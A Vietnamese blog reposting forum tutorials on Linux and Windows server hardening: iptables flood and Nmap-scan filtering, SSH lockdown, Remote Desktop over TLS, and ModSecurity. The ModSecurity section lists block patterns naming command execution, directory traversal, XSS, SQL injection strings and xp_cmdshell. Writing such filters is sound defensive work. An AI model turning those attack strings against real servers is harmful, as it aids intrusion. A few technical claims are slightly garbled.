BANNED_IP="10.0.0.0/8 192.168.0.0/16 172.16.0.0/12 224.0.0.0/4 240.0.0.0/5"
for i in $BANNED_IP; do
iptables -A INPUT -i eth0 -s $i -j DROP thả các gói dữ liệu đến từ các IP nằm trong danh sách cấm BANNER_IP
done
--------------------------------------------------------------------------------

Bước 4: lọc ICMP vào và chặn ngập lụt PING
LOG của Iptables sẽ được ghi vào file /var/log/firewall.log. Bạn phải sửa lại cấu hình cho SYSLOG như sau:

# vi /etc/syslog.conf
kern.=debug /var/log/firewall.log
# /etc/rc.d/init.d/syslogd restart

Đối với các gói ICMP đến, chúng ta sẽ đẩy qua chain CHECK_PINGFLOOD để kiểm tra xem hiện tại đamg bị ngập lụt PING hay không, sau đó mới cho phép gói vào. Nếu đang bị ngập lụt PING, môđun LOG sẽ tiến hành ghi nhật kí ở mức giới hạn --limit $LOG_LIMIT và --limit-burst $LOG_LIMIT_BURST, các gói PING ngập lụt sẽ bị thả hết.

LOG_LEVEL="debug"

LOG_LIMIT=3/m
LOG_LIMIT_BURST=1

PING_LIMIT=500/s
PING_LIMIT_BURST=100

iptables -A CHECK_PINGFLOOD -m limit --limit $PING_LIMIT --limit-burst $PING_LIMIT_BURST -j RETURN
iptables -A CHECK_PINGFLOOD -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PINGFLOOD:warning a=DROP "
iptables -A CHECK_PINGFLOOD -j DROP

iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j CHECK_PINGFLOOD
iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j ACCEPT
--------------------------------------------------------------------------------

Bước 5: reject quét cổng TCP và UDP
Ở đây bạn tạo sẵn chain reject quét cổng, chúng ta sẽ đẩy vào chain INPUT sau. Đối với gói TCP, chúng ta reject bằng gói TCP với cờ SYN=1 còn đối với gói UDP, chúng ta sẽ reject bằng gói ICMP `port-unreachable`

iptables-N REJECT_PORTSCAN
iptables-A REJECT_PORTSCAN -p tcp -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PORTSCAN:tcp a=REJECT "
iptables-A REJECT_PORTSCAN -p udp -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PORTSCAN:udp a=REJECT "
iptables-A REJECT_PORTSCAN -p tcp -j REJECT --reject-with tcp-reset
iptables-A REJECT_PORTSCAN -p udp -j REJECT --reject-with icmp-port-unreachable

--------------------------------------------------------------------------------

Bước 6: phát hiện quét cổng bằng Nmap
iptables-N DETECT_NMAP
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL FIN,URG,PSH -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:XMAS a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:XMAS-PSH a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL ALL -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:XMAS-ALL a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL FIN -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:FIN a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags SYN,RST SYN,RST -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:SYN-RST a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:SYN-FIN a=DROP "
iptables-A DETECT_NMAP -p tcp --tcp-flags ALL NONE -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=NMAP:NULL a=DROP "
iptables-A DETECT_NMAP -j DROP
iptables-A INPUT -i eth0 -p tcp ! --syn -m state --state NEW -j DETECT_NMAP

Đối với các gói TCP đến eth0 mở kết nối nhưng không đặt SYN=1 chúng ta sẽ chuyển sang chain DETECT_NMAP. Đây là những gói không hợp lệ và hầu như là quét cổng bằng nmap hoặc kênh ngầm. Chain DETECT_NMAP sẽ phát hiện ra hầu hết các kiểu quét của Nmap và tiến hành ghi nhật kí ở mức --limit $LOG_LIMIT và --limit-burst $LOG_LIMIT_BURST. Ví dụ để kiểm tra quét XMAS, bạn dùng tùy chọn --tcp-flags ALL FIN,URG,PSH nghĩa là 3 cờ FIN, URG và PSH được bật, các cờ khác đều bị tắt. Các gói qua chain DETECT_NMAP sau đó sẽ bị DROP hết.
--------------------------------------------------------------------------------

Bước 7: chặn ngập lụt SYN
Gói mở TCP với cờ SYN được set 1 là hợp lệ nhưng không ngoại trừ khả năng là các gói SYN dùng để ngập lụt. Vì vậy, ở dây bạn đẩy các gói SYN còn lại qua chain CHECK_SYNFLOOD để kiểm tra ngập lụt SYN như sau:

iptables-N CHECK_SYNFLOOD
iptables-A CHECK_SYNFLOOD -m limit --limit $SYN_LIMIT --limit-burst $SYN_LIMIT_BURST -j RETURN
iptables-A CHECK_SYNFLOOD -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SYNFLOOD:warning a=DROP "
iptables-A CHECK_SYNFLOOD -j DROP
iptables-A INPUT -i eth0 -p tcp --syn -j CHECK_SYNFLOOD
--------------------------------------------------------------------------------

Bước 8: giới hạn truy cập SSH cho admin
SSH_IP="1.1.1.1"
iptables -N SSH_ACCEPT
iptables -A SSH_ACCEPT -m state --state NEW -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SSH:admin a=ACCEPT "
iptables -A SSH_ACCEPT -j ACCEPT
iptables -N SSH_DENIED
iptables -A SSH_DENIED -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=SSH:attempt a=REJECT "
iptables -A SSH_DENIED -p tcp -j REJECT --reject-with tcp-reset
for i in $SSH_IP; do
iptables -A INPUT -i eth0 -p tcp -s $i --dport 22 -j SSH_ACCEPT
done
iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW -j SSH_DENIED
--------------------------------------------------------------------------------

Bước 9: giới hạn FTP cho web-master
FTP_IP="2.2.2.2"
iptables -N FTP_ACCEPT
iptables -A FTP_ACCEPT -m state --state NEW -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FTP:webmaster a=ACCEPT "
iptables -A FTP_ACCEPT -j ACCEPT
iptables -N FTP_DENIED
iptables -A FTP_DENIED -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FTP:attempt a=REJECT "
iptables -A FTP_DENIED -p tcp -j REJECT --reject-with tcp-reset
for i in $FTP_IP; do
iptables -A INPUT -i eth0 -p tcp -s $i --dport 21 -j FTP_ACCEPT
done
iptables -A INPUT -i eth0 -p tcp --dport 21 -m state --state NEW -j FTP_DENIED

--------------------------------------------------------------------------------

Bước 10: lọc TCP vào
iptables -N TCP_INCOMING
iptables -A TCP_INCOMING -p tcp --dport 80 -j ACCEPT
iptables -A TCP_INCOMING -p tcp -j REJECT_PORTSCAN
iptables -A INPUT -i eth0 -p tcp -j TCP_INCOMING
Bước 11: lọc UDP vào và chặn ngập lụt UDP
iptables -N CHECK_UDPFLOOD
iptables -A CHECK_UDPFLOOD -m limit --limit $UDP_LIMIT --limit-burst $UDP_LIMIT_BURST -j RETURN
iptables -A CHECK_UDPFLOOD -m limit --limit $LOG_LIMIT --limit-burst $LOG_LIMIT_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=UDPFLOOD:warning a=DROP "
iptables -A CHECK_UDPFLOOD -j DROP
iptables -A INPUT -i eth0 -p udp -j CHECK_UDPFLOOD

iptables -N UDP_INCOMING
iptables -A UDP_INCOMING -p udp --dport 53 -j ACCEPT
iptables -A UDP_INCOMING -p udp -j REJECT_PORTSCAN
iptables -A INPUT -i eth0 -p udp -j UDP_INCOMING

Để hạn chế khả năng bị DoS và tăng cường tốc độ cho máy chủ phục vụ web, bạn có thể dùng cách tải cân bằng (load-balacing) như sau:

Cách 1: chạy nhiều máy chủ phục vụ web trên các địa chỉ IP Internet khác nhau. Ví dụ, ngoài máy chủ phục vụ web hiện tại 1.2.3.4, bạn có thể đầu tư thêm các máy chủ phục vụ web mới 1.2.3.2, 1.2.3.3, 1.2.3.4, 1.2.3.5. Điểm yếu của cách này là tốn nhiều địa chỉ IP Internet.

Cách 2: đặt các máy chủ phục vụ web trong một mạng DMZ. Cách này tiết kiệm được nhiều địa chỉ IP nhưng bù lại bạn gateway Iptables 1.2.3.4 - 192.168.0.254 có thể load nặng hơn trước và yêu cầu bạn đầu tư tiền cho đường truyền mạng từ gateway ra Internet.

Bạn dùng DNAT trên gateway 1.2.3.4 để chuyển tiếp các gói dữ liệu từ client đến một trong các máy chủ phục vụ web trong mạng DMZ hoặc mạng LAN như sau:

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 192.168.0.1-192.168.0.4
--------------------------------------------------------------------------------

Mình đã trình bày xong các bạn về cách cấu hình tường lửa Iptables trên Linux. Hi vọng là bạn có thể nắm được các vấn đề mà mình đã trình bày và có thể tự mình đặt luật cho Iptables để bảo vệ cho máy chủ của bạn. Chúc bạn thành công.
(sưu tập và chỉnh sửa )

۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của ghost_vn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩

url:http://haiphongit.com/forum/showthread.php?t=2831

Phát hiện và chống xâm nhập Web Server với Mod Security

2008-09-11T21:31:00.002-07:00

Phát hiện và chống xâm nhập Web Server với Mod Security
1. giới thiệu về Mod_security
ModSecurity là một bộ máy phát hiện và phòng chống xâm nhập dành cho các ứng dụng web (hoặc 1 web application firewall). Hoạt động như một module của máy chủ web Apache, mục đích của ModSecurity là tăng cường bảo mật cho các ứng dụng web, bảo vệ chúng khỏi các loại tấn công đã biết và chưa biết.

Sau khi cài đặt Apache mặc định sẽ không có mod_security.Bạn phải download mod_security từ http://www.modsecurity.org .Phiên bản mới nhất hiện nay là 1.9. Mod_security dùng được cho cả apache 1.x và 2.x (trên cả windows ,*.nix …)

2.Cài đặt và cấu hình:
Việc install Mod_security tương đối đơn giản,sau khi đã download Binary packages về:
Với apache 2.x:
Bạn chỉ việc copy file mod_security.so vào thư mục modules/ của apache và mở file httpd.conf thêm vào dòng sau:
LoadModule security_module modules/mod_security.so
là có đã hoàn thành bước cài đặt
Với apache 1.x:
Ban copy file mod_security.so (*.nix ) hoăc mod_security.dll (windows) vào thư mục libexec/ và mở file httpd.conf thêm vào dòng sau:
LoadModule security_module libexec/mod_security.so
Để sử dụng mod_security bạn phải cấu hình cho nó( cái này tùy vào mỗi hệ thống mà sẽ dẫn đến những cấu hình khác nhau). Trước tiên bạn mở file httpd.conf ra và thêm vào dòng sau:

# cấu hình cho mod_security

hoặc bạn có thể tạo riêng một file là modsecurity.conf trong thư mục conf cua apache và include nó tù file cấu hình của apache httpd.conf:

include conf/modsecurity.conf

Sau khi cài đặt mặc định bộ máy filtering sẽ disable ( muốn dùng mod_security chúng ta phải bật nó lên).
Ban chỉ việc thêm vào dòng sau trong file modsecurity.conf:
SecFilterEngine On ( or Off , DynamicOnly )
Sau đây là cách cấu hình cho mod_security để hạn chế những kiểu tấn công cơ bản:

#Chống lại kiểu tấn công thực thi các lệnh:
SecFilter /etc/password
SecFilter /bin/ls
#Chống lại kiểu tấn công Directory traversal
SecFilter "\.\./"
#Lọc các kí tự hay dùng trong shell code
SecFilterForceByteRange 32 126
#Lọc các kí tụ hay dùng trong XSS attack
SecFilter "<(.|\n)+>"
SecFilter "<[[:space:]]*script"
#chống lại kiểu tấn công XSS thông qua PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
#Hạn chế sqlinjection attack
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
#Hạn chế MSSQL injection attack
SecFilter xp_enumdsn
SecFilter xp_filelist
SecFilter xp_availablemedia
SecFilter xp_cmdshell
SecFilter xp_regread
SecFilter xp_regwrite
SecFilter xp_regdeletekey
#chống spam mail

SecFilterSelective "ARG_recipient" "!@modsecurity\.org$"

#phát hiện xâm nhập
SecFilterSelective OUTPUT "Volume Serial Number"
SecFilterSelective OUTPUT "Command completed"
SecFilterSelective OUTPUT "Bad command or filename"
SecFilterSelective OUTPUT "file(s) copied"
SecFilterSelective OUTPUT "Index of /cgi-bin/"
SecFilterSelective OUTPUT ".*uid\=\("
#Nếu muốn ghi lại log
SecAuditLog logs/audit.log
SecFilterDebugLog logs/modsec.log
SecFilterDebugLevel 0
#Muốn mod_security phân tích POST request, dùng:
SecFilterScanPOST On

# để mod_security *kiểm tra* URL encoding và UTF-8.
SecFilterCheckURLEncoding On
SecFilterCheckUnicodeEncoding On
Lưu ý:nếu bạn dùng SecFilterCheckUnicodeEncoding On, một số bộ gõ hay input tiếng Việt sẽ không hoạt động, một số bộ gõ hay input tiếng Việt sẽ không hoạt động
Nếu bạn chạy web với nhiều virtualhost và muốn một site trong nhiều sites không dùng mod_security, bạn có thể dùng:
SecFilterSelective SERVERNAME "^tên_của_web_site$" nolog,allow

3. Lời kết
Trên đây chỉ là vài cấu hình cơ bản,Còn rất nhiều kiểu cấu hình mà tôi không đề cập (tùy thuộc vào hệ thống của bạn mà có cấu hình cho thích hợp).
Chúc bạn thanh công.
(st)

۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của ghost_vn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩

*** Một người đi xe máy va phải chú sẻ bay ngược chiều. Anh ta dừng xe, thấy chưa chết bèn nhặt về đắp thuốc rồi thả vào lồng. Tỉnh lại, thấy mình bên song sắt, chú sẻ thở dài: - Bỏ mẹ. Mình đâm chết thằng đi xe máy rồi. Chắc tù mọt gông đây..pó tay con chim ***

_.:: Nếu bài biết hay xin hãy kích Thank ::._

url:http://haiphongit.com/forum/showthread.php?t=2830

Mẹo và thủ thuật bảo mật SSH nâng cao

2008-09-11T21:31:00.001-07:00

Mẹo và thủ thuật bảo mật SSH nâng cao
Mẹo và thủ thuật bảo mật SSH nâng cao

Trong bài này, chúng tôi giới thiệu một số thủ thuật đơn giản giúp bạn nâng cao tính năng bảo mật cho dịch vụ Secure Shell (SSH).

File cấu hình server SSH được đặt trong thư mục /etc/ssh/sshd_conf. Bạn cần khởi động lại dịch vụ SSH sau mỗi lần thay đổi để các thay đổi đó được thực thi.

Thay đổi cổng SSH

Mặc định, SSH tuân theo các kết nối đến trên cổng 22. Kẻ tấn công thường sử dụng phần mềm quét cổng xem liệu các host (máy trạm) có sử dụng dịch vụ SSH không. Thay đổi cổng SSH lên cao hơn 1024 là một lựa chọn khôn ngoan, vì hầu hết mọi chương trình quét cổng (gồm cả nmap) mặc định đều rà soát được các cổng cao.

Mở file /etc/ssh/sshd_config và tìm dòng có ghi:
Port 22
Thay đổi số cổng và khởi động lại dịch vụ SSH:
/etc/init.d/ssh restart
Chỉ cho phép sử dụng giao thức SSH 2

Có hai loại giao thức SSH. Nếu chỉ dùng giao thức SSH 2 thì sẽ an toàn hơn nhiều vì SSH 1 thường gặp phải vấn đề bảo mật với kiểu tấn công man-in-the-middle và insertion. Mở file /etc/ssh/sshd_config và tìm dòng sau:
Protocol 2,1
Thay đổi dòng thành protocol 2.

Chỉ cho phép một số đối tượng người dùng đăng nhập qua SSH

Bạn không nên cho phép người dùng root đăng nhập qua SSH, vì điều này gây nên mối đe doạ bảo mật lớn mà không cần thiết. Nếu một kẻ tấn công nào đó thu được đặc quyền root khi đăng nhập vào máy, khả năng phá hoại có thể gấp mấy lần người dùng thông thường. Bạn nên cấu hình server SSH không cho phép người dùng root đăng nhập. Đầu tiên, tìm dòng ghi:
PermitRootLogin yes
Thay đổi yes thành no và khởi động lại dịch vụ. Sau đó bạn có thể đăng nhập lại hệ thống với bất kỳ vai trò người dùng xác định nào đó và chuyển sang người dùng root nếu muốn trở thành siêu người dùng.

Sẽ khôn ngoan hơn khi tạo một user cục bộ giả hoàn toàn không có đặc quyền gì trên hệ thống và dùng tên user đó để đăng nhập SSH. Sử dụng cách thức này sẽ giúp máy tính không bị hại dù tài khoản người dùng có bị xâm phạm. Khi tạo người dùng này, hãy chắc chắn nó phải nằm trong nhóm wheel để bạn có thể chuyển sang nhóm superuser (siêu người dùng) nếu cần.

Nếu muốn tạo danh sách một số đối tượng người dùng được phép đăng nhập vào SSH, bạn có thể mô tả chúng trong file sshd_config. Ví dụ, nếu muốn cho phép người dùng anze, dasa, kimy đăng nhập qua SSH, ở cuối file sshd_config, thêm vào một dòng như sau:
AllowUsers anze dasa kimy
Tạo banner SSH tuỳ biến

Nếu muốn mời một người dùng kết nối tới dịch vụ SSH để xem một thư nào đó, bạn có thể tạo banner SSH tuỳ biến. Thực hiện đơn giản bằng cách tạo một file text (trong ví dụ là file etc/ssh-banner.txt) và đặt bất kỳ kiểu thư text nào bạn có vào trong đó. Ví dụ:
*****************************************************************
*This is a private SSH service. You are not supposed to be here.*
*Please leave immediately. *
*****************************************************************
Khi muốn chỉnh sửa hoặc ghi file, trong sshd_conf, tìm dòng ghi:
#Banner /etc/issue.net
Không cần bình luận về dòng trên mà hãy thay đổi đường dẫn tới file text banner SSH tuỳ biến của bạn.

Sử dụng cơ chế thẩm định khoá công cộng DSA

Thay vì sử dụng tên và mật khẩu khi đăng nhập vào SSH, bạn có thể dùng cơ chế thẩm định khoá công cộng DSA. Chú ý rằng bạn có thể sử dụng username, password và khoá DSA cùng một lúc. Sử dụng cơ chế thẩm định khoá công cộng DSA cho phép hệ thống ngăn chặn được kiểu tấn công theo sách vở, vì bạn có thể đăng nhập vào dịch vụ SSH mà không cần dùng đến tên và mật khẩu. Thay vào đó, bạn cần một cặp khoá DSA: một khoá chung (public) và một khoá riêng (private). Khoá riêng được giữ trên máy của bạn, còn khoá chung được đưa lên server. Khi muốn đăng nhập vào một phiên SSH, server sẽ kiểm tra khoá. Nếu tất cả thông số đều khớp, bạn được đưa vào hệ thống. Nếu khoá không khớp, kết nối bị ngắt.

Ở ví dụ dưới đây, máy riêng sẽ kết nối tới máy chủ được đặt tên là station1 và máy chủ là server1. Trên cả hai máy đều có cùng một thư mục chủ (home folder). Chú ý là kết nối sẽ không hoạt động nếu thư mục chủ trên client và server khác nhau. Đầu tiên, tạo một cặp khoá trên máy riêng với lệnh ~$ ssh-keygen -t dsa. Bạn sẽ được nhắc cụm mật khẩu cho khoá riêng, nhưng hãy để trống, chúng ta chưa quan tâm đến phương thức này vội. Một cặp khoá được tạo: khoá riêng nằm trong ~/.ssh/id_dsa và khoá chung được đặt tại .ssh/id_dsa.pub.

Tiếp theo, copy nội dung ~/.ssh/id_dsa.pub to server1 vào file ~/.ssh/authorized_keys. Nội dung trong ~/.ssh/id_dsa.pub có dạng:
~$ cat .ssh/id_dsa.pub
ssh-dss AAAAB3NzaC1kc3MAAACBAM7K7vkK5C90RsvOhiHDUROvYbNgr7YEqtrdfFCUVwMWcJYDusNG
AIC0oZkBWLnmDu+y6ZOjNPOTtPnpEX0kRoH79maX8NZbBD4aUV91lbG7z604ZTdrLZVSFhCI/Fm4yROH
Ge0FO7FV4lGCUIlqa55+QP9Vvco7qyBdIpDuNV0LAAAAFQC/9ILjqII7nM7aKxIBPDrQwKNyPQAAAIEA
q+OJC8+OYIOeXcW8qcB6LDIBXJV0UT0rrUtFVo1BN39cAWz5puFe7eplmr6t7Ljl7JdkfEA5De0k3WDs
9/rD1tJ6UfqSRc2qPzbn0p0j89LPIjdMMSISQqaKO4m2fO2VJcgCWvsghIoD0AMRC7ngIe6btaNIhBbq
ri10RGL5gh4AAACAJj1/rV7iktOYuVyqV3BAz3JHoaf+H/dUDtX+wuTuJpl+tfDf61rbWOqrARuHFRF0
Tu/Rx4oOZzadLQovafqrDnU/No0Zge+WVXdd4ol1YmUlRkqp8vc20ws5mLVP34fST1amc0YNeBp28EQi
0xPEFUD0IXzZtXtHVLziA1/NuzY= anze@station1.example.com
Nếu file ~/.ssh/authorized_keys đã tồn tại, gắn thêm nội dung trong ~/.ssh/id_dsa.pub vào file ~/.ssh/authorized_keys trên server1. Bạn chỉ cần thực hiện một việc là thiết lập chính xác đặc quyền trong file ~/.ssh/authorized_keys trên server1:
~$ chmod 600 ~/.ssh/authorized_keys
Bây giờ cấu hình file sshd_conf để sử dụng cơ chế thẩm định khoá DSA. Hãy chắc chắn rằng bạn có ba dòng không chú thích sau:
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys
Khởi động lại dịch vụ. Nếu mọi thứ đã được cấu hình chính xác, bạn đã có thể sử dụng SSH cho server và đặt trực tiếp nó vào thư mục chủ mà không cần bất kỳ tương tác nào khác.

Nếu muốn chỉ sử dụng duy nhất một cơ chế thẩm định DSA, không cần chú thích hay thay đổi dòng PasswordAuthentication trong file sshd_config từ yes thành no:
PasswordAuthentication no
Nếu ai đó cố gắng kết nối tới dịch vụ SSH mà không có khoá chung trên server, anh ta sẽ bị từ chối và thậm chí không được đưa nền đăng nhập ra với thông báo lỗi:
Permission denied (publickey).
Sử dụng các hàm bao TCP để cho phép chỉ một số host được kết nối

Phương thức trên sẽ rất hữu ích nều bạn muốn giới hạn số host trên mạng có thể kết nối tới dịch vụ SSH. Nhưng nó không thể sử dụng hoặc kết hợp được với cấu hình các bảng IP (iptable). Thay vào đó, bạn có thể dùng các hàm bao TCP, cụ thể là sshd TCP. Bạn có thể đưa ra quy tắc chỉ cho phép một số host nhất định trên mạng con cục bộ (local subnet) 192.168.1.0/24 và host từ xa 193.180.177.13 kết nối tới dịch vụ SSH.

Các hàm bao TCP mặc định đầu tiên sẽ xem trong file /etc/hosts.deny danh sách các host bị từ chối kết nối tới dịch vụ. Tiếp theo là file /etc/hosts để xem liệu có quy tắc nào cho phép một số host kết nối tới một dịch vụ đặc biệt nào đó không. Ví dụ, tôi sẽ tạo một quy tắc như vậy trong tư mục /etc/hosts.deny:
sshd: ALL
Quy tắc trên có nghĩa là, mặc định tất cả các host đều bị cấm truy cập dịch vụ SSH. Điều này là cần thiết, vì nếu không tất cả các host ở đây đều có quyền truy cập dịch vụ SSH. Do hàm bao TCP đầu tiên sẽ xem xét trong file hosts.deny, nếu không có quy tắc nào liên quan đến ngăn chặn sử dụng dịch vụ SSH, bất kỳ host nào cũng có thể đến nôi đến nó. Tiếp theo, tạo một quy tắc trong /etc/hosts để cho phép chỉ một số host cụ thể (như được định nghĩa ở trên) sử dụng dịch vụ SSH:
sshd: 192.168.1 193.180.177.13
Bây giờ, chỉ có các host trên mạng 192.168.1.0/24 và host 193.180.177.13 mới có quyền truy cập dịch vụ SSH. Tất cả host khác đều bị ngắt kết nối trước khi được đăng nhập và nhận một thông báo lỗi như sau:
ssh_exchange_identification: Connection closed by remote host
Sử dụng iptables để giới hạn số lượng host được kết nối

Một lựa chọn khác ngoài các hàm bao TCP là giới hạn truy cập SSH với iptables (các bảng địa chỉ IP). Song, bạn có thể sử dụng kết hợp cả hai phương thức này cùng một lúc. Dưới đây là một ví dụ đơn giản về cách cho phép một số host nhất định kết nối tới SSH:
~# iptables -A INPUT -p tcp -m state --state NEW --source 193.180.177.13 --dport 22 -j ACCEPT
Và để chắc chắn rằng không có host nào khác được truy cập dịch vụ SSH:
~# iptables -A INPUT -p tcp --dport 22 -j DROP
Ghi lại một số quy tắc mới và hoàn chỉnh công việc.

Một số mẹo thời gian SSH

Bạn có thể dùng các tham số iptables khác để giới hạn kết nối tới dịch vụ SSH trong một khoảng thời gian nhất định. Kiểu thời gian có thể là giây, phút, giờ, hoặc ngày (/second, /minute, /hour, /day ), như ví dụ dưới đây.

Ở ví dụ đầu, nếu người dùng nhập mật khẩu sai, truy cập vào dịch vụ SSH sẽ bị khoá trong một phút. Và sau đó người dùng chỉ được phép gõ thông tin đăng nhập vào sau từng phút:
~# iptables -A INPUT -p tcp -m state --syn --state NEW --dport 22 -m limit --limit 1/minute --limit-burst 1 -j ACCEPT
~# iptables -A INPUT -p tcp -m state --syn --state NEW --dport 22 -j DROP
Trong ví dụ thứ hai, iptables được thiết lập chỉ cho phép host 193.180.177.13 kết nối tới dịch vụ SSH. Sau ba lần đăng nhập thất bại, iptables chỉ cho phép host đăng nhập lại sau từng phút:
~# iptables -A INPUT -p tcp -s 193.180.177.13 -m state --syn --state NEW --dport 22 -m limit --limit 1/minute --limit-burst 1 -j ACCEPT
~# iptables -A INPUT -p tcp -s 193.180.177.13 -m state --syn --state NEW --dport 22 -j DROP
Kết luận

Các thành phần này không khó cầu hình, nhưng chúng là những kỹ thuật rất mạnh trong chế độ bảo mật dịch vụ SSH. Bỏ ra chút thời gian đầu tư, bạn sẽ có được giấc ngủ ngon.

۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của ghost_vn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩

urlhttp://haiphongit.com/forum/showthread.php?t=2105

Tăng Độ Bảo Mật Khi Remote Desktop Bằng SSL

2008-09-11T20:06:00.000-07:00

Tăng Độ Bảo Mật Khi Remote Desktop Bằng SSL
I. Giới Thiệu
- Mặc định Terminal server dùng chế độ mã hóa native RDP . Chế độ này không chứng thực server . Do đó để gia tăng tính bảo mật khi remote desktop thì chúng ta sẽ sử dụng Transport Layer Security (TLS) version 1.0 . Với chế độ này chúng ta có thể mã hóa và chứng thực máy remote tới server

II. Chuẩn bị
- Máy client phải là windows XP or window 2000 và phải cài RDP 5.2 . Download tại đây : http://nhatnghe.com/tailieu/remote_ssl/tool/rdp.msi

- Máy Terminal server phải là windows server 2003 SP1 trở lên . Phải cài các component sau : ( phải cài theo thứ tự )
* ASP.net
* IIS
* Stand alone – CA

III. Thực Hiện

A. Cấu hình trên máy Terminal Server

• Cài đặt Certificate

B1 : Mở Internet explorer : đánh vào địa chỉ http://IP_máy_server/certsrv
B2 : Chọn Request a certificate

B3 : Chọn Advanced Certificate Request

B4: Chọn Create and submite a request to this CA

B5 : Điền thông tin trong phần Identifying Information giống như trong hình .
***** Phần name rất quan trọng . Nếu bạn muốn client remote bằng tên gì thì tên CA phải để giống như vậy. Ví dụ nếu muốn remote qua đường internet thì chỗ này phải để con IP tĩnh , or domain , or host cập nhật IP động . Còn làm test trong lan chơi thì chỗ này hoặc là để IP hoặc là để tên máy tính ( tùy vào việc muốn client remote tới server bằng cái gì )
- Type of certificate needed : Chọn Server Authentication Certificate

Cuộn xuống dưới :
- CSP : chọn Microsoft RSA SChannnel Cryptographic Provider
- Chọn mục Mark keys as exportable
- Chọn mục Store certificate in the local computer certificate store
- Chọn Submite > Yes

B6 : Start > Program > Administrative tools > Certification Authority > Chọn Pending Request
B7 : Chuột phải lên CA trong đây > All tasks > Issue

B8 : Mở IE > truy cập http://IP_máy_server/certsrv
Chọn View the status of a pending certificate request

Chọn Server Authentication Certificate

Chọn install this certificate

Chọn yes

• Cấu hình Transport Layer Security : chứng thực và mã hóa

B1 : Start > Program > Administrative tools > Terminal Services Configuration
B2 : Trong khung bên trái chọn connection > Khung bên phải : chuột phải RDP-tcp > chọn Properties

B3 : Trong tab General > Chọn Edit

B4 : Chọn CA đã xin > Ok > OK

B5 : Trong phần security layer có 3 lựa chọn :
*RDP Security Layer : chế độ mặc định khi remote desktop thông thường
*Negotiate : Chế độ này sẽ dùng TLS để chứng thực máy client , tuy nhiên nếu máy client không hỗ trợ TLS thì máy đó sẽ không được chứng thực
*SSL : Chế độ này sẽ dùng TLS để chứng thực máy client , nếu máy client không hỗ trợ TLS thì sẽ không thể tạo kết nối tới server

- Ở đây chúng ta dùng chế độ SSl
- Nếu dùng SSL or Negotiate thì trong phần encrytion level phải chọn là High . Ở chế độ high này thì đường truyền sẽ được mã hóa ở chế độ 128 bit
- Đánh dấu chọn vào mục “Use standard Windows logon interface”

B. Download CA từ máy Server và import vào client

Thực hiện trên Server
B1 : Mở IE đánh địa chỉ : http://localhost/certsrv
B2 : Chọn Download a CA certificate , certificate chain , or CLS

B3 : Chọn Download a certificate

B4 : Chọn Save > chọn nơi lưu > copy file mới save dzô USB để dành

Thực hiện trên client :
B1 : Mở start > run > đánh lệnh MMC
B2 : Menu File > Chọn add/remove spap-in > chọn Add
B3 :Chọn Certificates

B4 : Chọn Computer accounts > next > Finish

B5 : Chỉnh Regedit > Start > run > regedit > tìm đến khóa HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Terminal Server Client

- Chuột phải lên Terminal Server Client > chọn New > Dword value > Sửa tên giá trị mới tạo thành AuthenticationLevelOverride

- Double click vào AuthenticationLevelOverride > Trong ô value data đánh vào gía trị : 1

B6 : Kiểm tra : Start > program > remote desktop connection ( anh nào mở start > run > oánh mstsc >Có thể nó ra phiên bản RDP cũ hổng chạy ráng chịu )
